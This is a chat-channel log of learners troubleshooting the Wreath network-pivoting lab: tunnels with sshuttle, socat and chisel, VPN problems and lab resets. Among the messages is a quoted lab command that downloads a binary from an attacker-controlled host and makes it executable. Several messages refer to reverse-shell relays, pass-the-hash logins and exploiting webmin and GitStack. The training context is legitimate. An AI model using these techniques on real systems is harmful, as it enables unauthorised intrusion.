#wreath-network

1 messages Β· Page 1 of 1 (latest)

boreal tusk
#

Anyone like to be the magical 5th to reset the server? πŸ˜„

sharp ice
#

What's your subnet?

boreal tusk
#
  1. It's okay was just a slow reboot. I'm struggling with one of the tasks and wanted to rule out the fact it'd been online for 12 hours.
boreal tusk
#

I've been raging for ages on Task 29 and now I realise the -S in the php server is actually case sensitive haha 😦

dark sphinx
#

Hello, I have a small problem to access the windows machine from a compromised server, in my terminal I am told that I am connected to the server but when I type the ip 10.200.81.150 in browser I can not access it

boreal tusk
dark sphinx
#

I am on task 28

boreal tusk
#

Task 28 is Empire hop server?

dark sphinx
#

yes

boreal tusk
#

So you've already been connected to .150 with whatever tunnel in the previous sections?

dark sphinx
#

yes, it worked yesterday but now it doesn't

boreal tusk
#

You'll need to re-add ports to the firewall exceptions.

#

I used sshuttle so sshuttle to webserver (.200) then can view the git server in a browser (.150)

dark sphinx
#

I also use sshuttle but I can send you a screen in mp I don't have the permission here ?

boreal tusk
#

!docs verify

thin crescentBOT
boreal tusk
#

You can post screenshots once you verify.

dark sphinx
#

okay thanks I'll do that and send you

boreal tusk
#

Just post in here no need to DM.

dark sphinx
#

so it doesn't work

#

I can't access it at the .150

boreal tusk
#

It's like me and my case sensitive PHP server flag yesterday. It's always the simple things.

dark sphinx
#

yes it's true, I made an error of inattention

#

And also I had a last problem it was when I wanted to create a http_top listener it put me an error

sick cypress
#

im starting wreath now... god rest my soul

grizzled river
#

After starting the web server with 'sudo python3 -m http.server 80' in task 17, how can you see that it is running as the video says at 1:41?

grizzled river
# sharp ice Will look like this.

That's how it appears to me, but if you see the support video, the person can execute commands or has a root user that I don't understand how to access him after he says 'let's go to our python server' in the minute I mentioned before. the part that shows me, being there, I can't continue with the task.

grizzled river
# sharp ice Will look like this.

or tell me please from where do I run this 'curl ATTACKING_IP/nmap-USERNAME -o /tmp/nmap-USERNAME && chmod +x /tmp/nmap-USERNAME'?

merry robin
boreal tusk
winter lintelBOT
#

Gave +1 Rep to @merry robin

merry robin
#

Glad you enjoyed it πŸ™‚

boreal tusk
#

Really nice to learn about pivoting through networks like that. πŸ™‚

sick cypress
#

50% done with wreath. man my mind is blown

boreal tusk
merry robin
boreal tusk
#

am I terrible for quite enjoying qterminal and not having learned tmux yet

#

I think I've gotten used to the Ctrl E/D/R shortcuts and now tmux hurts my brain.

sick cypress
sick cypress
#

@merry robin thank you for the great teaching points omfg

winter lintelBOT
#

Gave +1 Rep to @merry robin

azure niche
#

Hello everyone, I feel like the web server is struggling atm, is everything ok ? (EU-West)

strange bison
nimble elm
#

Hey fam, requesting for a reset 4/5

#

The routes are messed up

strange bison
#

Please state which instance you need resetting

nimble elm
#

Could you be a bit more clearer? Cause I don't see a region associated with networks, like EU

strange bison
#

There are no regions

nimble elm
strange bison
#

You can vote to reset every hour so I recommend doing that anyway

nimble elm
mellow kernel
#

Hi, I am at task 18 git server pivoting. I used sshuttle to take access when I got connected its saying

#

"Failed to flush caches: Unit dbus-org.freedesktop.resolve1.service not found.
fw: Received non-zero return code 1 when flushing DNS resolver cache."

#

and i can't open 10.200.57.150 on web browser can anyone help ?

sick cypress
#

Screenshot @mellow kernel

mellow kernel
#

well i resolve that DNS error

sick cypress
#

I'm going back over it today to do an official pen test write-up for my own XP. So I could probably see what I did because I think I had that issue as well

mellow kernel
#

but how do i access .150 webpage

sick cypress
#

Add it to your hosts.

#

Whenever you did the in-map scan it should have said cannot reject you something. something

#

Redirect

#

Add that name as well as the IP address to your host file

#

Nmap,**

mellow kernel
#

no nothing like that happen when i did nmap

sick cypress
#

You will soon realize that most of everything behind a public facing IP address that they give you you will have to add to hosts

#

It didn't say anything under port 80?

mellow kernel
#

it just gave me live hosts and ip i should do it again

sick cypress
#

It should have said something like cannot contact Port 80 or something and it redirected from something.thm

#

I'm not at my computer so I cannot pull up my host file but I can give you the address and such whenever I get back to it

#

Try and add the dot 150 address hosts

mellow kernel
#

i did nmap again this is what it returns

#

Nmap scan report for ip-10-200-57-150.eu-west-1.compute.internal (10.200.57.150)
Host is up (0.00070s latency).

sick cypress
#

show your shuttle command

mellow kernel
#

sshuttle -r root@10.200.57.200 --ssh-cmd "ssh -i id_rsa" 10.200.57.0/24 -x 10.200.57.200
c : Connected to server.

#

i tried curl 10.200.57.150 through ssh and the whole terminal got stuck

#

cant ctrl + c either had to close it

sick cypress
#

So here's the thing. Everything is correct and if it says connected to server you are fine. If it doesn't go down or kick out any errors you are

#

Connected

#

Connected to dot 150, it took me about 4 to 5 minutes for the page to load

#

Is this the part where you foxy proxy too

mellow kernel
#

if i ping to .150 i should get a reply ?

#

how do I confirm i am connected any command ?

sick cypress
#

If you're connected to a shuttle you should be able to ping.150. the problem is it's an internal Network so if you're outside of the internal connection you won't be able to ping anything

#

Screenshot with s shuttle says for me whenever you connect

mellow kernel
#

write now i am connected

#

with sshuttle

#

wait i just got an error from sshuttle

#

client_loop: send disconnect: Broken pipe
c : fatal: ssh connection to server (pid 5531) exited with returncode 255

sick cypress
#

Okay there's an error for the broken pipe in the wreath section I think

mellow kernel
#

how do i fix this ?

sick cypress
mellow kernel
#

i am already using -x and excluding .200

mellow kernel
#

can someone help still stuck at task 18

grizzled river
#

Hello, I have problems connecting to the wreath-network, I run the openvpn file and in the access section it appears disconnected, what can I do in this case?

mellow kernel
mellow kernel
#

could you reset wreath ?

strange bison
#

There are many many instances of wreath. If you'd like help resetting your instance, please specify what instance which is the third octet of machine IPs.

mellow kernel
#

.57

strange bison
#

You can add an additional vote to reset every hour, so you're able to reset the network yourself over time.

grizzled river
# strange bison Ignore the access page

Do you mean that it is not necessary to show the Internal Virtual IP Address and the Connected well configured for it to work and that way I will have a connection with the wreath machine?

strange bison
grizzled river
strange bison
#

Ok, and that is indeed an issue.
But that issue is unrelated to the access page, and does not indicate that you should trust the access page.

grizzled river
azure niche
#

Hello, I am struggling to understand the chosen orden in the socat command I highlighted in my screenshot.
I understand that the first address is the source, and second one the destination. So if we want to get access to the webserver on .10:80 on our .2:8001, why do we have to put the .2:8001 first instead of putting .10:80 ? Hope this was clear enough

#

Because to me the stream goes as this : Target Webserver (source) --> compromised machine --> local attack machine (dest)

where am I wrong here ?

#

To add to my confusion, the following command socat tcp-l:8001 tcp-l:8000,fork,reuseaddr & is forwarding everything reaching port 8001 to port 8000, which makes sense to me (source, destination)

grizzled river
#

hello, in task 18, what is the id_rsa that should be used to be able to execute sshuttle?

strange bison
#

The ssh part of sshuttle is ssh

merry robin
#

What goes into port 8000 locally will come out of port 8001, and vice versa.
The remote socat command (I.e. the one on the jumpbox) connects 172.16.0.10:80 to your local port 8001

#

I.e. what goes into port 8000 on your box will come out of port 8001 and get forwarded to 172.16.0.10:80

#

Then the response from 172.16.0.10:80 goes straight back through the tunnel.
.10:80 -> .2:8001 -> .2:8000

azure niche
#

Ooh I see ! I saw something false somewhere else then, thanks a lot for your time
This clears up a lot of (useless) confusion πŸ™‚

merry robin
#

Np :)

grizzled river
grizzled river
grizzled river
winter lintelBOT
#

Gave +1 Rep to @strange bison

grizzled river
#

Does anyone know what is the content of the private key used in task 18?

inland sequoia
#

Is there an issue with ssh on octet .101 on the .200 box?
I was connected yesterday just fine, but now I can't ssh or use sshuttle on the initial webserver - just get a 'connection closed' error.

I've confirmed I can ping the machine and ||use the webmin exploit to access the shell through there. ||
||I've also confirmed that ssh is open on the machine and the id_rsa file I have matches the one on the box itself.||

#

I should also clarify that I have reset the network since this issue and it still happens

inland sequoia
#

No, because I'm not getting either the c: connected message or the broken pipe one. There's just no response. When I was connected previously, I did not need to use the - x flag.

halcyon tulip
#

Completing wreath really unlocked a new skillset for me. Thanks THM

final olive
#

what do you recommend guys? can i stilldo this on attackbox or my own vm kali?

merry robin
final olive
#

Thanks

ionic tide
#

I sshed into 10.200.87.200 and i tried to curl http://10.200.87.150 but i gets stucks i dont get a response back or any kind i tried nmap -p80 10.200.87.150 from 10.200.87.200 i get 80 as filtered

#

i tried reseting the box

final olive
#

my vm is connected to the network but there is no ping

#

or nmap scan there is no result

#

any reasons as to why?

ionic tide
#

i recently reseted the machine because of this

final olive
#

cool

#

thanks

ionic tide
#

no still it didnt resolved the issue

final olive
#

still not?

ionic tide
#

no can you ping it ?

final olive
#

no reply

#

i cant

ionic tide
#

10.200.87.200 works fine for me the rrest two doesnt work

final olive
#

lets see

#

when is the latest i can get back after all the reset to do the room again?

#

after how long time?

ionic tide
merry robin
#

Normal VPN pack or the Wreath VPN pack?

final olive
#

wreath

merry robin
#

No idea then I'm afraid. I can't debug the network status

final olive
#

ok

#

i could nmapit but couldnot get the webpage to open even i add the ip address to etc/hosts

ionic tide
#

any staff can look into this ?

#

@final olive did it resolved for you?

ionic tide
ionic tide
surreal sail
#

I was able to login with || evil-winrm as Admin (Pass The Hash)|| yesterday
And now it just refuses to connect

surreal sail
#

NVM forgot to ||use sshuttle|| :p

neat mesa
#

Hi there I try to use chisel with proxy. When I use chisel server on my kalibox it works, but when I try to use chisel client on my kalibox it does not work. Then comes a connection error, does it have something to do with the firewall? Should I try to change the firewall settings? Many thanks in advance! Here is a screenshot...

fervent summit
# neat mesa

Use a colon to separate the IP and port. Right now, in your client, you're using 10.200.57.200.8080. it should be 10.200.57.200:8080

neat mesa
winter lintelBOT
#

Gave +1 Rep to @fervent summit

orchid cave
#

Hi, the host seems down, can someone please vote for restarting the network?

fervent summit
#

Having some issues downloading the Webiste.git directory through evil-winrm.

#

It says completed almost immediately yet nothing is downloaded

lilac ibex
#

Has anyone tried VPN tunnels over ssh with adding interfaces to not have to rely on socks proxies over proxychains?

merry robin
lilac ibex
# merry robin It will work, yes. That was something I chose not to add into the network, but w...

Shuttle is good until you have to scan anything. Not sure other people have this issue but when I use nmap over sshuttle it just says all ports are open even the closed ones.

Tried to do VPN over ssh without sshuttle by adding the interfaces and setting up Nat. But it doesn't route properly. The route you would put for 10.200.X.0/24 is already cleaned by the ovpn connection.

Trying to just state a single route with 10.200.X.150/32 doesn't break the route but nmap doesn't seem to see the first windows machine through the ssh vpn tunnel. Even if you try to specify interface with -e tun1

quasi bramble
#

hi
im doing wreath room
but the exploit isn't working

#

task 6

#

this is the error am geting

#

@merry robin

lilac ibex
#

Will try sshuttle with nmap -sT TCP scan.

raven whale
#

I'm having trouble building the bash script to check on ports are active and allowing ICMP... do you have a recommended resource to get better at this? what was your approach?

#

I know the basics of what is going on here but I might be missing a piece or two

lilac ibex
#

@nocturne zodiac using -sT didn't work over sshuttle

#

shuttle says closed ports are open

raven whale
#

yes, this is related to the last question of Task 9

raven whale
#

+rep @lilac ibex

winter lintelBOT
#

Gave +1 Rep to @lilac ibex

lilac ibex
#

+rep @nocturne zodiac

winter lintelBOT
#

Gave +1 Rep to @nocturne zodiac

lilac ibex
#

All good. Was worth a try though

raven whale
#

I have a few questions about Task 13 Pivoting Socat

#

I was able to get through the point where I retrieve the executable from the attackbox but can't get the full reverse shell relay going

raven whale
#

tried getting a portable nc from github but now failing to compile it locally before shipping it to the vulnerable server

#

I think that is the only missing piece in both the paths to 'reverse shell relay'. How do I tackle this on this lab?

lilac ibex
#

@raven whale I did this with a mix of sshuttle, chisel, and metasploit.

Can try again later with socat if you still need help when I'm free.

raven whale
#

Sounds good @lilac ibex. Thanks!

winter lintelBOT
#

Gave +1 Rep to @lilac ibex

lilac ibex
raven whale
#

correct... I'll see if I can get back to it today. I'll let you know what I find out @lilac ibex

raven whale
#

well... I can't reach the prod server... just put in a request for reset and we need 3 more for it to take effect

lilac ibex
#

@raven whale got it with redirection as shown in socat section but not sure how to do it with full socks proxy over socat. However make anything like a firewall isn't getting in the way ;'..;'

raven whale
#

Going back to 'what the shell?' to review proper implementation of different types of shells

#

@lilac ibex ^

lilac ibex
#

@raven whale powershell reverse shell through socat relay
<lhost-attacker> <pivot-socat-relay-no-socks-proxy> <internal-machine1>

#

<listener> <----[revshell]----- <relay-pivot> <---[revshell-ps1]--- <internal-machine-one>

#

haven't tried chaining together for duel pivoting though

#

would Assume you would do the same thing 2x for every other pivot or through another pivot technique

lilac ibex
raven whale
#

I'll give those approaches a try later today. Thanks @lilac ibex!

winter lintelBOT
#

Gave +1 Rep to @lilac ibex

hollow sapphire
#

I may have broken the wreath network (prod-serv) during an alternative pivot attempt a few seconds ago - sorry😳

somber juniper
#

Hello am I on Task 20 and I added the info to etc/hosts but I cant get access to it:
So is my etc/hosts:

Learning

10.200.101.200 thomaswreath.thm
10.200.101.150 gitserver.thm

#

i can access using the ip 10.200.101.150

proud cargo
#

reset network?

fallow jolt
#

I just completed the room, it was running fine

proud cargo
#

Its a long room but its fun 🀣

fallow jolt
#

yes hahah, I learned a lot from it

proud cargo
#

I don't quite understand what they mean when they say "transfer the private key to the box". To make sure. Do I have to take the "id_rsa" key that I generated with ssh-keygen, and put that into the .ssh directory of root on the network?

#

Just to make sure as I don't want to break the box

merry robin
#

Like, /tmp, for example

proud cargo
#

would /tmp work?

#

oh

merry robin
#

Mhm

proud cargo
#

Wow. It takes so much brain power to actually understand SSH tunneling and port forwarding 😭

merry robin
proud cargo
coral geyser
merry robin
#

Port forwarding and tunnelling are easy, they just need decent networking foundations. Once you understand how traffic flows around a network, forcing it to take another route is fairly straight forward.

unkempt python
merry robin
strange bison
#

Normal people just run a VPN server to get into the env

unkempt python
#

Yeah, tbh, I usually am DA before I even get on a windows machine

unkempt python
merry robin
#

It's a useful skill to have though. Only time it's likely to be useful irl is if you've compromised a jumpbox though

unkempt python
#

Yeah, figured as much.

merry robin
somber juniper
#

Hello,
at task 42. How did u manage to upload winpeas and which one did u guy oploadP

proud cargo
#

Evening. I just have one question. In the second example it supplies 2 ip addresses. '172.16.0.x and 172.16.0.5' but in the command is as follows: 'sshuttle -r user@172.16.0.5 172.16.0.0/24. Is the '172.16.0.0 a new ip address or does it refer the .x address? And is the /24 a port? Thank you

split harbor
#

this image might help a bit

proud cargo
#

so subnetting is basically dividing a network into two or more networks?

split harbor
#

yuups kinda

proud cargo
#

Those numbers are confusing ngl πŸ˜‚

proud cargo
#

I just don't remember what exactly I've learned there

proud cargo
winter lintelBOT
#

Gave +1 Rep to @split harbor

split harbor
#

did you skip the essential note taking??

proud cargo
#

haha in the beginning yes. But I make sure to dot down everything :/

#

Time to go over that pathway again. 2 steps forward one back

split harbor
#

nah 1 000 steps forward and 1 back to remake notes

proud cargo
#

Indeed πŸ‘

merry robin
# proud cargo so subnetting is basically dividing a network into two or more networks?

Best advice I can give you here is to go back and learn how things work before you start trying to attack them. I say that as the guy who built this thing, but I mean that just generally. Trying to build with no foundations will never end well. You won't understand what you're doing, which means you'll break stuff, which means you'll get fired, assuming you even manage to get a job in the industry without said foundational knowledge.

That's a general statement for the record, "you" applies to anyone in a similar position, rather than just yourself πŸ™‚

There's nothing to be gained from leaping in two-feet first without understanding the underlying technologies, and no shame in taking the time to learn them properly before starting with the "cool" stuff. Perfect example is above: attempting to attack a pivoting network without understanding how networks work. In a lab environment you get confused and need help. IRL you break shit and cause big issues πŸ€·β€β™‚οΈ

dusk swan
#

network responding super slow

dusk swan
#

ye 10.200.101 seems to be down or not working properly - it was running extremely slow so I let it expire and upon restarting cant connect or see anything scanning after ~20 minutes

#

i try later πŸ€·β€β™‚οΈ

proud cargo
#

Im having trouble at task 20 where I actually have to run the python script to exploit the gitstack service. I'm getting an error

#

If someone could help me that would be really nice

split harbor
proud cargo
#

No matter what command I use to install the requests I get this error. Is there a way to uninstall and reinstall them?

#

When trying to uninstall them it says this

split harbor
#

ah maybe it is python2 and not python3

proud cargo
#

Like this?

split harbor
#

yuup

#

but first python2 -m pip install requests

proud cargo
#

/usr/bin/python2: No module named pip

strange bison
proud cargo
split harbor
proud cargo
#

Ive added the /usr/bin/python there

#

wait

#

I guess i've got something working but not really

strange bison
split harbor
#

true

proud cargo
#

have you guys done this room?

strange bison
#

I have.

strange bison
#

Just... python3 43777.py

proud cargo
#

but the code is written in older python

#

Muireland used ./

strange bison
#

And make sure you install the library for python2

#

This is why we use Kali, one of many reasons. It still ships the libraries and pip.

dusk swan
#

i cant progress because the network isnt working properly. reset it last night and worked fine for when I was using it but logging on again this morning i cant connect its unreachable

merry robin
#

There is a Python 3 conversion of that script literally pinned in this channel

proud cargo
#

Thank you Muiri. I've not know that

azure current
#

Hi here, I'm trying to exploit the web server from task 6 and I'm using the exploit from MuirlandOracle github but I'm getting this error: Cannot import mappings from "collections". Any clues how to resolve this? thanks!

proud cargo
#

Screenshot? @azure current

barren sage
#

I tried to enable but not getting it to turn on

hollow oracle
#

I have trouble with task 34. I got chisel runing and can connect to the page via proxychains. But wappalyzer gives me the wrong version number. XXX #.#.# instead of XXX #.#.##

I also tried whatweb through proxychains but rthis did not work. Is thee a similar extension I can use?

#

Oh and even XXX --version on the git server gave me the sam versionnumber which wappalyzer provieds...

#

Appologize, i was on the wrong machine πŸ’€

olive phoenix
#

Hi, I'm trying to connect to Wreath network but I'm getting this:

$ ssh root@10.200.101.200 -i id_rsa
ssh: connect to host 10.200.101.200 port 22: No route to host
#

I'm using a personal kali linux machine with openvpn:

$ sudo openvpn xxxx-wreath.ovpn
[...]
2022-09-24 12:40:26 OPTIONS IMPORT: timers and/or timeouts modified
2022-09-24 12:40:26 OPTIONS IMPORT: --ifconfig/up options modified
2022-09-24 12:40:26 OPTIONS IMPORT: route options modified
2022-09-24 12:40:26 OPTIONS IMPORT: route-related options modified
2022-09-24 12:40:26 OPTIONS IMPORT: peer-id set
2022-09-24 12:40:26 OPTIONS IMPORT: adjusting link_mtu to 1624
2022-09-24 12:40:26 Using peer cipher 'AES-256-CBC'
2022-09-24 12:40:26 Outgoing Data Channel: Cipher 'AES-256-CBC' initialized with 256 bit key
2022-09-24 12:40:26 Outgoing Data Channel: Using 512 bit message hash 'SHA512' for HMAC authentication
2022-09-24 12:40:26 Incoming Data Channel: Cipher 'AES-256-CBC' initialized with 256 bit key
2022-09-24 12:40:26 Incoming Data Channel: Using 512 bit message hash 'SHA512' for HMAC authentication
2022-09-24 12:40:26 net_route_v4_best_gw query: dst 0.0.0.0
2022-09-24 12:40:26 net_route_v4_best_gw result: via 192.168.1.254 dev eth0
2022-09-24 12:40:26 ROUTE_GATEWAY 192.168.1.254/255.255.255.0 IFACE=eth0 HWADDR=00:e0:4c:82:01:5f
2022-09-24 12:40:26 TUN/TAP device tun0 opened
2022-09-24 12:40:26 net_iface_mtu_set: mtu 1500 for tun0
2022-09-24 12:40:26 net_iface_up: set tun0 up
2022-09-24 12:40:26 net_addr_v4_add: 10.50.102.160/24 dev tun0
2022-09-24 12:40:26 net_route_v4_add: 10.200.101.0/24 via 10.50.102.1 dev [NULL] table 0 metric 1000
2022-09-24 12:40:26 WARNING: this configuration may cache passwords in memory -- use the auth-nocache option to prevent this
2022-09-24 12:40:26 Initialization Sequence Completed
#
β”Œβ”€β”€(rodolpheγ‰ΏLAPTOP-KALI)-[~/…/Cyber/THM/Wreath/tmp]
└─$ ip a 
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
24: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_pie state UNKNOWN group default qlen 500
    link/none 
    inet 10.50.102.160/24 scope global tun0
       valid_lft forever preferred_lft forever
    inet6 fe80::8923:8577:542a:16f/64 scope link stable-privacy 
       valid_lft forever preferred_lft forever
cerulean lodge
#

and then do simple port scan or nmap scan to check that ssh service is running on which port

merry robin
#

"No route to host". i.e. couldn't get into the network.

cerulean lodge
#

but he is connected to vpn

merry robin
#

Whether that's local routing or a problem with the network instance I have no idea.

cerulean lodge
#

and if he will ping that ip

#

he will get some clue

merry robin
#

Then they will get no route to host

#

Same as when they tried to SSH

cerulean lodge
#

then local routing prblm

merry robin
#

Or a problem with the network instance.

#

More likely the latter to be quite honest.
Either way I do not have the power to debug it.

cerulean lodge
#

i would debug like i told

cerulean lodge
merry robin
#

Then the error would be "connection refused"...

cerulean lodge
#

yep you are right

strange bison
# cerulean lodge yep you are right

Muirland is the creator of Wreath.
I'd recommend his advice first and foremost.
Please make sure any troubleshooting advice you give is accurate, your advice here isn't overly applicable.

tepid aurora
#

hey im facing issue downloading the vpn pack it say 404

#

can anyone help?

odd osprey
#

Hello guys i'm trying to ssh as root on prod-serv but 'im getting this:

#

ssh -i id_rsa_webmin root@thomaswreath.thm
Load key "id_rsa_webmin": error in libcrypto
root@thomaswreath.thm: Permission denied (publickey,gssapi-keyex,gssapi-with-mic).

proper saddle
#

who mess up wreath network? 3/5 votes to restart the lab

languid elbow
#

I knocked it up to 4/5, just need 1 more

strange bison
zealous kindle
#

Hi ! I have "zsh: segmentation fault ssh -i rsa_id root@10.200.90.200" when trying to connect ssh so the pivoting with sshuttle cannot be done 😦 anyone faced this issue ?

split harbor
zealous kindle
#

the command :

#

if anyone has infos pls ping me

#

litteraly stuck here for a day

zealous kindle
#

After resetting the labs I still have this error any help @merry robin

kind kayak
#

This machine is unreachable

zealous kindle
#

Nevermind I used chisel, ssh is broken

high acorn
#

Not too sure what I am doing wrong here...can anyone take a look at my screenshot and throw some advice my way haha? thank you.

#

The id_rsa key that I am using is the same one that we are able to find in the roots .ssh. Is that the correct key to use for this?

high acorn
#

....Anyone having this issue just add sudo. #K.I.S.S. πŸ˜‚

slate girder
#

~~can someone vote to reset please 10.200.81.200 isn't responding ~~ tyty

high acorn
#

Anyone else on 10.200.101.200....can we reset? Need 3. Thank you

light isle
#

will do and come back

#

prod-serv IIRC does not allow you to log in whatever you do, you need the password

high acorn
#

Also make sure you have the id_rsa perms set to 600

proud cargo
#

Evening. I'm havning some trouble to start the php server on the port that my listener is on. I think im getting confused with some of the port. Any help would be appreciated

strange bison
proud cargo
#

But how am I supposed to catch the agent?

#

if I can't listen on the port 45000

strange bison
#

Assuming it's a reverse payload

proud cargo
#

yes the c2 listener is listening on port 45000

#

so I cant listen on port 45000 with the php server?

#

Because on dark secs video he has a listener on 17000 and then also starts the php server on 17000 so I'm not quite sure how he did that

proud cargo
#

Okay I got it to listen but now it's giving me this error: "[root@prod-serv hop-apollyon2]# [Fri Oct 7 19:04:01 2022] 10.200.85.150:50196 [404]: /news.php - No such file or directory"

dark zinc
#

anyone having problems with vpn file? cant download it

strange bison
#

Looks like a problem with your kali tbh. Download it on your host of it's a VM

#

Then copy it in

dark zinc
winter lintelBOT
#

Gave +1 Rep to @strange bison

dark zinc
#

getting problems with connection on vpn wreath

strange bison
dark zinc
strange bison
#

Ok. That's not a problem.

dark zinc
strange bison
#

Why not try it?

dark zinc
strange bison
#

You're apparency connected to one then

#

So that's not a VPN issue

dark zinc
strange bison
#

I didn't say everything

#

You asked about the VPN so I answered about the VPN

dark zinc
strange bison
#

Without knowing more about what you're doing, and then troubleshooting, I can't say.

dark zinc
strange bison
#

You've just reposted the same thing again.

#

"Failed to execute command" looks like the problem there. Doesn't look like a network issue.

dark zinc
strange bison
#

Without knowing more. You posted the same thing again. That's not more.

dark zinc
#

will take a look on the nmap scan

dark zinc
nocturne seal
#

Probably been asked before, but how long does it normally take to spin up the network? Still no ping at 27mins here now πŸ€”

obsidian hollow
#

that is not normal

#

usually 5 to 10 in my experience

obsidian hollow
#

I just wrapped up wreath. Big thanks @merry robin for the amazing experience.

winter lintelBOT
#

Gave +1 Rep to @merry robin

dark zinc
#

someone having issues when running empire? my machine is working very slow...

nocturne sinew
#

Hey guys for the wreath network -- just to clarify we have to laterally move from the first foothold to a different box (with windows & other) correct if im wrong

rough crystal
#

anyone up doing wreath rn ?
trying to ssh to web server , but keeps getting errored out
root@10.200.85.200: Permission denied (publickey,gssapi-keyex,gssapi-with-mic)
to add: my ssh private key permissions are 600

merry robin
nocturne sinew
#

Nope, im attempting to get the box before I redo it again and follow the room task

#

im already at the late stage

#

its kinda more of an educational thing for me aswell

strange bison
charred fern
merry robin
#

That and, as James said, there are specific instructions about how to approach things in a way that does not mess up the lab for other people

#

In particular regarding changes to configs, updating firewall rules, naming conventions for uploading scripts / tools, etc

#

Case in point is above -- some moron has overwritten either the private key or the authorized_keys file on .85.200. That's one or more of:

  • Stupidity
  • Not reading the instructions
  • Malice
    Either way it now requires everyone else in that lab to disrupt their own experience and reset the boxes.
#

(Side note, if you're on 10.200.85.0/24 and that was you, please vote for a reset and follow the instructions for how not to fuck it up lmao)

merry robin
#

kekw Ta James

nocturne sinew
#

Also, i did followed the instructions and it just gave me more confusion. I wont ask again thanks

nocturne sinew
#

Its all good thank you ill find a way

dense gulch
#

Hello to all. I am working on Wreath after the stage of the operation of the Webserver, I noticed that its IP address is no longer reachable. I tried to restart the room, change the VPN file but when I try to ping it doesn't work. Can anyone help me please?

dark marlin
#

Jumped on today to try and pick up where I left off yesterday - the network is no longer responding to ping (gives error Destination Host Unreachable), can't ssh in (gives error "ssh: connect to host 10.200.85.200 port 22: No route to host"). I've voted for a reset but it's only at 3/5 so any help would be appreciated @merry robin cheers!

merry robin
#

Nothing I can do I'm afraid 😦
I've never had access to the network administration interface -- I just built the thing πŸ€·β€β™‚οΈ

split harbor
#

think you can add a vote every hour or so too

dark marlin
winter lintelBOT
#

Gave +1 Rep to @merry robin

tepid kiln
#

@merry robin i am going to begin my journey in this path, im totally flabbergasted of content in this room. however compliments to you and wish me luck in this room πŸ™‚

merry robin
#

Gl πŸ˜„

tepid kiln
#

ok so im trying to nmap the webserver

#

and it is taking ages

#

like ages

#

cant even ping it might be the firewall tho

upbeat solstice
#

hello!
i am trying to use sshuttle for the first time and im getting this error but dont really know what does it mean or what am i doing wrong. can u guys please give me a hint?

upbeat solstice
#

yes, i am using wsl

strange bison
#

It won't work then

upbeat solstice
#

noooooo

strange bison
#

Make a VM, it's generally better. Snapshots are cool.

upbeat solstice
winter lintelBOT
#

Gave +1 Rep to @strange bison

upbeat solstice
#

hello

#

how normal is this?

strange bison
upbeat solstice
winter lintelBOT
#

Gave +1 Rep to @strange bison

upbeat solstice
#

hello again. i cannot access the network after it went to sleep because i forgot to extend time. yesterday same thing happened.

tropic oracle
#

unable to connect through vpn

split harbor
#

if that gives you an ip you are connected

merry robin
#

10.10.10.10 is in the public subnet

split harbor
#

sooo that is not a way to check if you are connected to wreath??? welp then that is a problem shadow dunno how to handle

tropic oracle
slate hare
#

Hi everyone, did you know why the machine about Wreath doesn't work ? i checked my vpn and generated another one nothing append, how can i fix that ? Thanks

waxen nebula
slate hare
#

@waxen nebula Wreath vpn

waxen nebula
#

And you've checked the status that it's connected? What response do you get? Have you tried connecting using the AttackBox instead?

slate hare
#

status about vpn when i am connect with vpn wreath is acces machine in red color i'll try with AttackBox and i give answer asap when it's up

#

Destination Host Unreachable with AttackBox @waxen nebula

waxen nebula
#

Have you completed the NMap room, suggested in Task 5? Have you tried different switches with nmap?

slate hare
#

yes task 5 is completed with nmap i'm actually at 14 and have tried another switches with nmap but nothing

keen leaf
#

Can someone please explain to me why on earth metasploit portfwd is not working?
The first time it works just fine and then it just hangs when I make requests to my machine. curl also does not work, it seems to be loading infinitely. Was this made on purpose?

ionic tide
#

yay now suddenly it works

warped mulch
#

hi I'm in task 6. at first the id_rsa file was empty but now I'm getting the root@10.200.85.200: Permission denied (publickey,gssapi-keyex,gssapi-with-mic). even after i got the rsa file. can someone help me figure this out or show me where to look for the answer please?

merry robin
# warped mulch hi I'm in task 6. at first the id_rsa file was empty but now I'm getting the roo...

Unfortunately, the chances are that it's not your fault. These are shared networks, and many people are, frankly, either absolute assholes who like spoiling it for other people, or idiots who can't follow instructions and break it for everyone else by accident.
I added extra protections to that file, but it still gets broken fairly frequently and I don't have access to improve it anymore.

If the key is missing, go for a reset.

warped mulch
#

I found the new one next morning but it disent work it gibes me a premisiondenied(publickey,gassapi-keyex,gassapi-with-mic) error i checked the config file on both attack machine and tge victam machine and they simed fine idk if itd the new key that is the problem or im missing some thing becuase idk how thr key just appiered next morning.

marble flax
#

Hey, i keep getting timeouts when i try to access the homepage via FF in "Webserver Enumeration". I changed the host-file and the dns works but i still get timeouts. Is this a known problem if the network is borked? Or is this more likely my machine? I can scan and ping the machine.

sand onyx
#

@marble flax

ionic tide
#

daw

steady grove
#

So I downloaded the id_rsa to be able ssh back into the prod server… but when I attempt the ssh, sometimes it just stays with no output ever happening until I finally Cntl C it, and sometimes nothing happens for a few min then it tells me β€˜connect to host 10.200.105.200 port 22: connection timed out’ … I can ping the server no issues, I even tried a plain β€˜ssh root@10.200.105.200’ to see if I get asked for a password but no I just get the exact same response - nothing happening or sometimes that timed out response…. When I add a -vv the final output before nothing else happening until I close it out reads - β€˜debug1: expecting SSH2_MSG_KEX_ECDH_REPLY’ - that’s when trying to use rsa key, and when doing a -vv on trying to connect with password instead of the key, it gets stuck on β€œdebug1: connecting to 10.200.105.200 port 22” before getting connection timed out ultimately …. Any suggestions?!? Thanks in advance 🀘

warped mulch
#

I think the keys are messed up because i have problem with the private key on the other machine . Abd the public keys are changing every day it either some one messing with them or people cant find it and just generate thier own.

steady grove
#

Ehhhhhh okay that sheds some light on the issue, thanks

left burrow
#

Hello guys

Can't download wreath network vpn config file.

It is only redirecting to a 404, any help?

warped mulch
#

hi i checked the ssh_config file on the server and i saw that the password authentication is commented out and i believe that is what preventing me from sshing into the system. i cant change it and i don't want to break anything trying so if i can het some help with it would be great. this is the error that I'm getting if its relevant: Permission denied (publickey,gssapi-keyex,gssapi-with-mic).

merry robin
#

The error you're getting is usually when some idiot has overwritten the key on the box, or removed the protections on the authorized keys file to overwrite that

#

TL;DR: reset the network and try grabbing the key again πŸ™‚

warped mulch
#

